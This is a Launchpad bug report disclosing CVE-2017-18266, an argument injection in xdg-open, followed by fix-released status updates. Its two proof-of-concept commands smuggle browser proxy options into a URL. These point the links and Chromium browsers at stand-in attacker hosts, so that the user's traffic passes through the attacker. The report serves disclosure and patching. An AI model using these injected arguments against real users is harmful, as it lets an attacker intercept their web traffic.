Ubuntu
xdg-utils package

CVE-2017-18266: argument injection in xdg-open

Bug #1772295 reported by Nicholas Guriev
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Xdg-utils
Fix Released
High
xdg-utils (Ubuntu)
Fix Released
Undecided
Nicholas Guriev

Bug Description

An attacker can silently set their proxy in browser settings to capture user's traffic, using a malformed URL in xdg-open.

The following command tries to open Yandex main page though third-party proxy server.

    env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-proxy evil-site.example.org:8080'

Another sample of an exploit with Chromium browser.

    env -i BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac"

CVE References

Nicholas Guriev (mymedia)
Changed in xdg-utils (Ubuntu):
assignee: nobody → Nicholas Guriev (mymedia)
information type: Private Security → Public Security
Bug Watch Updater (bug-watch-updater)
Changed in xdg-utils:
importance: Unknown → High
status: Unknown → Fix Released
Revision history for this message
Steve Beattie (sbeattie) wrote :

This was addressed in https://usn.ubuntu.com/usn/usn-3650-1 and in xdg-utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!

Changed in xdg-utils (Ubuntu):
status: New → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.